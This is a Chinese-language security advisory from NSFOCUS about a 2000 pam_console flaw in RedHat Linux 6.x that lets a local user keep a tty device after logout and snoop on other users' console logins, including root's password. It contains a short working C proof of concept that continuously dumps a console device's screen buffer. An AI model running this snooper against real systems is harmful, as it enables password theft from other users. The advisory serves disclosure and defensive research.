首页 -> 安全研究

安全研究

安全漏洞
Linux pam_console 导致控制台用户口令泄漏

发布日期:2000-05-09
更新日期:2000-05-10

受影响系统:
RedHat Linux 6.2 sparc
RedHat Linux 6.2 i386
RedHat Linux 6.2 alpha
RedHat Linux 6.1 sparc
RedHat Linux 6.1 i386
RedHat Linux 6.1 alpha
RedHat Linux 6.0 sparc
RedHat Linux 6.0 i386
RedHat Linux 6.0 alpha
描述:

很多Linux系统都已经在运行PAM,PAM中的pam_console模块存在一个安全问题。当用户从
控制台登陆进Linux系统时,这个模块会允许用户控制某些特定的设备,例如声音设备等等。
用户登陆时,它将设备权限改成该用户所有,当用户退出时,模块将权限改为root所有。
然而,某些设备并没有真正的挂断机制,例如tty设备。因此一个本地用户可能设法使他在
退出登陆后仍然控制该设备。这将允许恶意用户监听其他用户的控制台登陆过程,如果root
从该控制台登陆,恶意用户可能获得root口令。恶意用户也可能以其他控制台登陆用户的身
份执行命令。

<* 来源: Michal Zalewski <lcamtuf@tpi.pl> *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#include <sys/fcntl.h>

main(int argc,char*argv[]) {
  char buf[80*24];
  int f=open(argv[1],O_RDWR);
  while (1) {
    lseek(f,0,0);
    read(f,buf,sizeof(buf));
    write(1,"\033[2J\033[H",7); // clear terminal, vt100/linux/ansi
    write(1,buf,sizeof(buf));
    usleep(10000);
  }
}




建议:
暂无

浏览次数:6319
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障